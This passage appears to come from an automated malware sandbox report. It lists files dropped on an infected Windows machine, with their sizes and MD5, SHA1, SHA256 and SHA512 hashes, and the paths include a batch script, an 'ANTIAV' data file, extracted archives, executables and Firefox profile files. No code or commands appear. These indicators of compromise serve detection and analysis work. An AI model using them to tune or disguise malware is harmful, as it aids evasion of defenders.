                                                                                                                        SHA1

                                                                                                                        e6f843343265c038a7b340d412795ab31176ef39

                                                                                                                        SHA256

                                                                                                                        f3b4123a66aacafe980321a2da2a3631367ae898269d629efc134149a02d05df

                                                                                                                        SHA512

                                                                                                                        0376dddb29eb71037c4be3aa8690d7e57f546d63d8d9c58aa68c0d769054ff4a2f91f746ef44cdcaf29e3230054cfd7a0ea462a4a91e06708db0da4ff905e654

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2J9156.exe

                                                                                                                        Filesize

                                                                                                                        1.8MB

                                                                                                                        MD5

                                                                                                                        0cefe9dfd3024abb0a90de7d3903deea

                                                                                                                        SHA1

                                                                                                                        11b1d1b803f45df9685826d6a2616219fd49c852

                                                                                                                        SHA256

                                                                                                                        fd864cb4c1cb656bf68153177fc4997132d00ae5bd2df2e181756295186804da

                                                                                                                        SHA512

                                                                                                                        fc8818b82f0ef2dce4755a872ab556ba3608ccb5d383747cf65a015e5a6bbe1f7804bc4c5d8d3fa68e05bb02481458f593d437a28929ef01ae933b50b1c8ee49

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Kxc4jvafeK.tmp

                                                                                                                        Filesize

                                                                                                                        114KB

                                                                                                                        MD5

                                                                                                                        d0150bee5e917cfd7a7152d6c1988919

                                                                                                                        SHA1

                                                                                                                        fbcb54efb2fc75f72eaea9605b1a2cae557a121b

                                                                                                                        SHA256

                                                                                                                        ea86bc11680540f71d4740429e19804ad5c375e5ceee098981f6aebe691b71c1

                                                                                                                        SHA512

                                                                                                                        a3c542917de3538c0a10445f3fd96395cac0f2c572fccc948ed755864d5800af16957d7deb5973a469cde52582d3e3ee6f4d3e87acd7b1084d64441268b2504d

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\YaoOF7PLhZ.tmp

                                                                                                                        Filesize

                                                                                                                        20KB

                                                                                                                        MD5

                                                                                                                        49693267e0adbcd119f9f5e02adf3a80

                                                                                                                        SHA1

                                                                                                                        3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                                                        SHA256

                                                                                                                        d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                        SHA512

                                                                                                                        b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klw2fwci.ywi.ps1

                                                                                                                        Filesize

                                                                                                                        60B

                                                                                                                        MD5

                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                        SHA1

                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                        SHA256

                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                        SHA512

                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                        MD5

                                                                                                                        72491c7b87a7c2dd350b727444f13bb4

                                                                                                                        SHA1

                                                                                                                        1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                        SHA256

                                                                                                                        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                        SHA512

                                                                                                                        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                                                                                                        Filesize

                                                                                                                        458KB

                                                                                                                        MD5

                                                                                                                        619f7135621b50fd1900ff24aade1524

                                                                                                                        SHA1

                                                                                                                        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                        SHA256

                                                                                                                        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                        SHA512

                                                                                                                        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                        MD5

                                                                                                                        579a63bebccbacab8f14132f9fc31b89

                                                                                                                        SHA1

                                                                                                                        fca8a51077d352741a9c1ff8a493064ef5052f27

                                                                                                                        SHA256

                                                                                                                        0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0

                                                                                                                        SHA512

                                                                                                                        4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        5659eba6a774f9d5322f249ad989114a

                                                                                                                        SHA1

                                                                                                                        4bfb12aa98a1dc2206baa0ac611877b815810e4c

                                                                                                                        SHA256

                                                                                                                        e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4

                                                                                                                        SHA512

                                                                                                                        f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        5404286ec7853897b3ba00adf824d6c1

                                                                                                                        SHA1

                                                                                                                        39e543e08b34311b82f6e909e1e67e2f4afec551

                                                                                                                        SHA256

                                                                                                                        ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266

                                                                                                                        SHA512

                                                                                                                        c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        5eb39ba3698c99891a6b6eb036cfb653

                                                                                                                        SHA1

                                                                                                                        d2f1cdd59669f006a2f1aa9214aeed48bc88c06e

                                                                                                                        SHA256

                                                                                                                        e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2

                                                                                                                        SHA512

                                                                                                                        6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        7187cc2643affab4ca29d92251c96dee

                                                                                                                        SHA1

                                                                                                                        ab0a4de90a14551834e12bb2c8c6b9ee517acaf4

                                                                                                                        SHA256

                                                                                                                        c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830

                                                                                                                        SHA512

                                                                                                                        27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        b7d1e04629bec112923446fda5391731

                                                                                                                        SHA1

                                                                                                                        814055286f963ddaa5bf3019821cb8a565b56cb8

                                                                                                                        SHA256

                                                                                                                        4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789

                                                                                                                        SHA512

                                                                                                                        79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        0dc4014facf82aa027904c1be1d403c1

                                                                                                                        SHA1

                                                                                                                        5e6d6c020bfc2e6f24f3d237946b0103fe9b1831

                                                                                                                        SHA256

                                                                                                                        a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7

                                                                                                                        SHA512

                                                                                                                        cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

                                                                                                                        Filesize

                                                                                                                        3.3MB

                                                                                                                        MD5

                                                                                                                        cea368fc334a9aec1ecff4b15612e5b0

                                                                                                                        SHA1

                                                                                                                        493d23f72731bb570d904014ffdacbba2334ce26

                                                                                                                        SHA256

                                                                                                                        07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541

                                                                                                                        SHA512

                                                                                                                        bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\file.bin

                                                                                                                        Filesize

                                                                                                                        3.3MB

                                                                                                                        MD5

                                                                                                                        045b0a3d5be6f10ddf19ae6d92dfdd70

                                                                                                                        SHA1

                                                                                                                        0387715b6681d7097d372cd0005b664f76c933c7

                                                                                                                        SHA256

                                                                                                                        94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d

                                                                                                                        SHA512

                                                                                                                        58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\in.exe

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        83d75087c9bf6e4f07c36e550731ccde

                                                                                                                        SHA1

                                                                                                                        d5ff596961cce5f03f842cfd8f27dde6f124e3ae

                                                                                                                        SHA256

                                                                                                                        46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f

                                                                                                                        SHA512

                                                                                                                        044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\main.bat

                                                                                                                        Filesize

                                                                                                                        440B

                                                                                                                        MD5

                                                                                                                        3626532127e3066df98e34c3d56a1869

                                                                                                                        SHA1

                                                                                                                        5fa7102f02615afde4efd4ed091744e842c63f78

                                                                                                                        SHA256

                                                                                                                        2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca

                                                                                                                        SHA512

                                                                                                                        dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nNxId4Y4s9.tmp

                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                        MD5

                                                                                                                        a182561a527f929489bf4b8f74f65cd7

                                                                                                                        SHA1

                                                                                                                        8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                        SHA256

                                                                                                                        42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                        SHA512

                                                                                                                        9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\naYUECAbwU.tmp

                                                                                                                        Filesize

                                                                                                                        124KB

                                                                                                                        MD5

                                                                                                                        9618e15b04a4ddb39ed6c496575f6f95

                                                                                                                        SHA1

                                                                                                                        1c28f8750e5555776b3c80b187c5d15a443a7412

                                                                                                                        SHA256

                                                                                                                        a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

                                                                                                                        SHA512

                                                                                                                        f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pXsWXV27jP.tmp

                                                                                                                        Filesize

                                                                                                                        20KB

                                                                                                                        MD5

                                                                                                                        003a9b7ad062753918155530b84361b4

                                                                                                                        SHA1

                                                                                                                        a9794bb62e8aaa90925e98c79a6558bd8042f82d

                                                                                                                        SHA256

                                                                                                                        f88fce78c5c3ae2f43f36c291c37ea25a991fe46e7499cba651cd95480f42b06

                                                                                                                        SHA512

                                                                                                                        298c41745ad611707c644a65e9af5dfe79643323e6ba30208a84fd2e7f591af1367c35a9a4be75a32e436c1d1b41ea8f6b755f0eeca1585f9e4faa5a3c3a0844

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                        Filesize

                                                                                                                        479KB

                                                                                                                        MD5

                                                                                                                        09372174e83dbbf696ee732fd2e875bb

                                                                                                                        SHA1

                                                                                                                        ba360186ba650a769f9303f48b7200fb5eaccee1

                                                                                                                        SHA256

                                                                                                                        c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                                                                                                        SHA512

                                                                                                                        b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                                                        Filesize

                                                                                                                        13.8MB

                                                                                                                        MD5

                                                                                                                        0a8747a2ac9ac08ae9508f36c6d75692

                                                                                                                        SHA1

                                                                                                                        b287a96fd6cc12433adb42193dfe06111c38eaf0

                                                                                                                        SHA256

                                                                                                                        32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                                                                                                        SHA512

                                                                                                                        59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tpwnww.exe

                                                                                                                        Filesize

                                                                                                                        7.3MB

                                                                                                                        MD5

                                                                                                                        29713ebba8304896f257a90d12389de0

                                                                                                                        SHA1

                                                                                                                        8d5553b1931d7b1138163b681c191ee7f681ac83

                                                                                                                        SHA256

                                                                                                                        94196eb7588daa100a08d5075e5e03b4ae5bc05eaacf3d9ce77c84eaa3d1e9cd

                                                                                                                        SHA512

                                                                                                                        de2249cd067258e7a7bdb7f23f4d459ef4f1be0433fef7f6d3317b93c968a792f6ae8a8a6b6eab272b8e5047d6ff4099e6bee10c565d3fea7b6245edfaa3ac83

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        8b33eddcf0c70281f9930d853e6c5890

                                                                                                                        SHA1

                                                                                                                        978593468d49915fbd2f1c971943ce98ba6f7cac

                                                                                                                        SHA256

                                                                                                                        40e41bb87ae5b520c645b71a060a606914db96a0485d47c2c2781acac9d8c6d7

                                                                                                                        SHA512

                                                                                                                        c277a632b261ca310c51d7b9111fa090a88140514623bcc6052e9adaeae697a78c3cc61349d1d3cb96bce0bb7aeb2b7662054a6c86d247882032babc0a453393

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        0205937929d5f0a5cf60116976d43f1e

                                                                                                                        SHA1

                                                                                                                        15fedebbd5934eda9ff92e9ef6c6ed95ba85464a

                                                                                                                        SHA256

                                                                                                                        21c9e9c3da28b87b83935a7e98121b04d1c5f567983acab2107c695762c6c778

                                                                                                                        SHA512

                                                                                                                        05b53a17bc9be6b4cfcadd830aa93f928962565727b7f87c7f4ff3e122bb6c22b461bc17237eda75820a840b31fe9df56f1c5e148e62dbc1dafc5b90aebcafe9

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin

                                                                                                                        Filesize

                                                                                                                        13KB

                                                                                                                        MD5

                                                                                                                        8a5097a6aff3db3b88f0578176079c68

                                                                                                                        SHA1

                                                                                                                        cf27e046dd15d5f20f956233902172589f6f8d70

                                                                                                                        SHA256

                                                                                                                        812c9e1167ee1323551aec3223014c56e235d20df66da4814d3b771c6b676464

                                                                                                                        SHA512

                                                                                                                        31c7be37fab5bc3270ab326371e662af06e9b6cba2d3e567a754c2646ae8166911e673b2e20660c71c1022fceef44363f1f5735f879ef8a0f1e32d09368b9dd8

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.bin

                                                                                                                        Filesize

                                                                                                                        14KB

                                                                                                                        MD5

                                                                                                                        f3530411655aa2d66237c168b98f0454

                                                                                                                        SHA1

                                                                                                                        b80f1ab4907b67c96fbb7a99367d94a15a1473fc

                                                                                                                        SHA256

                                                                                                                        f5ca24fb148ec5a38a0391459617dffe2025c97873d7c3379ac6c1a6abc64422

                                                                                                                        SHA512

                                                                                                                        7682524c3d434601a5355f13a8013835eb39556d2abac301354a1548497e5cdea08cff309a04ca40db076a8466a8488f28bff0a6f3987a22181101537ba5cc0e

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.bin

                                                                                                                        Filesize

                                                                                                                        23KB

                                                                                                                        MD5

                                                                                                                        414940a417d05e4db558c7bf874f2fbf

                                                                                                                        SHA1

                                                                                                                        d5e13ebed28a3aea663934894672e729cb6294fa

                                                                                                                        SHA256

                                                                                                                        298f3a9a3d60e03612d764d120a768a70aac20d9f4f2e6eba48b5ccb60039456

                                                                                                                        SHA512

                                                                                                                        da29076a9ac612b5fcbd0c71e799fe0154a4b82197b60829b89089bbe6f228e343e3e395fae425620adaae834372726ac83cc679e07390a84374d38833c7cdea

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.bin

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        1ece5b6a2f2b73344e4dec5601185e21

                                                                                                                        SHA1

                                                                                                                        1c38175ffd6b653072fb961d93122e95092cc17a

                                                                                                                        SHA256

                                                                                                                        8aedb6c8635d5445b45629cff7004d1dea88af8ab95adde7cc284206e84f8293

                                                                                                                        SHA512

                                                                                                                        1654d3fb902df3e60c8449d40ceac51ca5229cea71013cc8d8ad49b625925f8f3049fd51d6653c99dafadf56cf698b1a7b1e43080f787d629e5f1a8ded45f9d4

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.bin

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        c010d833c4634e627790c3eae018f261

                                                                                                                        SHA1

                                                                                                                        e3ae4a29bbcdae6c81434993d50ea150178969b9

                                                                                                                        SHA256

                                                                                                                        2ccfb62427efe978f6125fda46d4e1c2f6e2386a5c3b5511a35e23af686e389b

                                                                                                                        SHA512

                                                                                                                        0c5b0da5e216a9e381d7e832660f7c9ae73766a9b154f305dd3f4c929632a8e2eaddce06f4c0ae5083f889e6a2b7ef6fbbbb1a47c2ed9582fab5560087f5041d

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        9c40f6e8cd0c91e0f479f63c39234a0c

                                                                                                                        SHA1

                                                                                                                        372cedb017dc93379dfe78ef27ff7b079ae0df6e

                                                                                                                        SHA256

                                                                                                                        eacef71b77e0a5367bc45efe056b6e309bbe57b7f70da932b1bf1e35939e725d

                                                                                                                        SHA512

                                                                                                                        10f53cf61d1cbad92a8530a7b9152acf04324a9c8150d68468756c7fd8c517296dd057654a3e104fd2f132aa4b0bc24df9cb7c62bf2d0b2517d9af672bba829b

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                        Filesize

                                                                                                                        15KB

                                                                                                                        MD5

                                                                                                                        d13cf6fcb7cad450662f06d1ab537009

                                                                                                                        SHA1

                                                                                                                        ed13144b84d521e35c44cbc6dea0c2e7e3a59dfa

                                                                                                                        SHA256

                                                                                                                        c55389ac6a7f77e46c067a07f03f8e060f4863d143bd7af6ddb05498204270f7

                                                                                                                        SHA512

                                                                                                                        ad59d7c09a344694444af223d5e783cb3b19fb0e38b374481a88d5139d3ff8ea5d488649464fc01820cba9e839809c6e04cdd8405c83dbd393e0586a2cc38b95

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                        Filesize

                                                                                                                        15KB

                                                                                                                        MD5

                                                                                                                        295004a1dad3f296298e9699d709d7ff

                                                                                                                        SHA1

                                                                                                                        fb64bab2b11b48873f3f7beafd628d581bd2f9fb

                                                                                                                        SHA256

                                                                                                                        c7b626ffce44ec4933105eaea35b68f7abe791002ed31087fb311c7023ff6c61

                                                                                                                        SHA512

                                                                                                                        0b9a8d7c467a4df3f282141e15b3d0a67da29fc4cd61b03530c5e8482689faf75bb42f5c4cc432c22c2eca3237ed325aaa73d4a177c8e11f1db824011e456b09

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        13550f429581483ed21e5457bbb71290

                                                                                                                        SHA1

                                                                                                                        a4131c9b287a167d3014978ab160086811aac3ab

                                                                                                                        SHA256

                                                                                                                        d7c3393f5be95d42f6c20424024717234e4643d24c0b48ee4feba24bb237f81c

                                                                                                                        SHA512

                                                                                                                        d16c05c613a351818cc05b519cdd6d11e86d448f0c677072e5c219e2312f3ac8eef9af14b3ff4cbe5078a032aa452260fdba9a599c576e72186d27b02ad760dc

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        2f2db99e68a51f818e2651fd7c8386b8

                                                                                                                        SHA1

                                                                                                                        eaef3fa8ba1126c801e2737bd22951d3e44f4264

                                                                                                                        SHA256

                                                                                                                        56f75d533114f007f89210cbf885d931854526291eb4face73e131fb2fe584d3

                                                                                                                        SHA512

                                                                                                                        d7476c7d088ee822ce9c7e9fa9784dac096a6dc5646618e091f11ab20a67e4fc21d4c2b415b5773ee98d78512644797b871f91f5ed49715aee19df6ef48b85fc

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\44124e51-3874-4173-8b00-e6cdc06a5873

                                                                                                                        Filesize

                                                                                                                        25KB

                                                                                                                        MD5

                                                                                                                        4d1cafd55191a3a2245413e394cd6a39

                                                                                                                        SHA1

                                                                                                                        2e13c58189898be044d9e7c9da0ffba48c6aee42

                                                                                                                        SHA256

                                                                                                                        e404d3e85ee57cdba4c8144aa00597ae4b5c135d141ded41479068e3fac1fa10

                                                                                                                        SHA512

                                                                                                                        a8dc2e21e7c9f635301c108d71b5e6dc50e6ae449e105c4941e0c2f93423e464a23cf6adb12478825391f4a9823af82a9dda550e2bb9e2abdfc8d7c85b1b289c

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\57c3bf4c-5945-4b36-9243-77105aa85827

                                                                                                                        Filesize

                                                                                                                        671B

                                                                                                                        MD5

                                                                                                                        fe5fdc3896fd303cf67c680168a9db4e

                                                                                                                        SHA1

                                                                                                                        38a02c5f9c554415cb212c6709ec75cc63869596

                                                                                                                        SHA256

                                                                                                                        efc2ecf4d73a0082e6ed0a994629e399d106bbe02b64aa16ea23fffd00d95386

                                                                                                                        SHA512

                                                                                                                        0e536de1a259b77123eeec7c31b6e6a4081bbebe3b51d52e307c14443f20d98f6c86d9305e0c781f280d86e7acc66ea84fdc02adc173f61373216a1b3fc39cf4

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\b0a4f5b8-3041-44aa-932a-79fe646a6744

                                                                                                                        Filesize

                                                                                                                        982B

                                                                                                                        MD5

                                                                                                                        edacd48c60b0a4194658eaa9fc819096

                                                                                                                        SHA1

                                                                                                                        b9192feea9974ee20183cc2dc071ad54a24d8621

                                                                                                                        SHA256

                                                                                                                        87411d5366ac1efb145ae67eb258efc350f39f94ca4f5d816ae4e7258d50c9b9

                                                                                                                        SHA512

                                                                                                                        7fd21ec35f68fc3a97238954d62c0c5f262f9bffbe495f361ee3a510b5b104edf512fcfd4290e290f31e2021b23261e60369593978c980e134330f5972124893

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                                                                                        Filesize

                                                                                                                        1.1MB

                                                                                                                        MD5

                                                                                                                        842039753bf41fa5e11b3a1383061a87

                                                                                                                        SHA1

                                                                                                                        3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                                                                                        SHA256

                                                                                                                        d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                                                                                        SHA512

                                                                                                                        d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                                                                                        Filesize

                                                                                                                        116B

                                                                                                                        MD5

                                                                                                                        2a461e9eb87fd1955cea740a3444ee7a

                                                                                                                        SHA1

                                                                                                                        b10755914c713f5a4677494dbe8a686ed458c3c5

                                                                                                                        SHA256

                                                                                                                        4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                                                                                        SHA512

                                                                                                                        34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                                                                                        Filesize

                                                                                                                        372B

                                                                                                                        MD5

                                                                                                                        bf957ad58b55f64219ab3f793e374316

                                                                                                                        SHA1

                                                                                                                        a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                                                                                        SHA256

                                                                                                                        bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                                                        SHA512

                                                                                                                        79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                                                        Filesize

                                                                                                                        17.8MB

                                                                                                                        MD5

                                                                                                                        daf7ef3acccab478aaa7d6dc1c60f865

                                                                                                                        SHA1

                                                                                                                        f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                                                        SHA256

                                                                                                                        bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                                                        SHA512

                                                                                                                        5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\prefs-1.js

                                                                                                                        Filesize

                                                                                                                        12KB

                                                                                                                        MD5

                                                                                                                        2c06bf146f66b64c54685d54442cab73

                                                                                                                        SHA1

                                                                                                                        d78b93ea9d7914b7049a225a1e59735f864121fa

                                                                                                                        SHA256

                                                                                                                        c3ea3e7bf9f7fd4e3ee39d49d8422cedd3e389ea506b95a4b1744ac8826f4b80

                                                                                                                        SHA512

                                                                                                                        c323c2da73875376889b0ba146bf9bb280210f971663ca723815108389c3eb0987015d255a50eebb6a5c8ea32a1f2eb41d894ab4b3ac7d54028c7b6542e10bbc

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\prefs-1.js

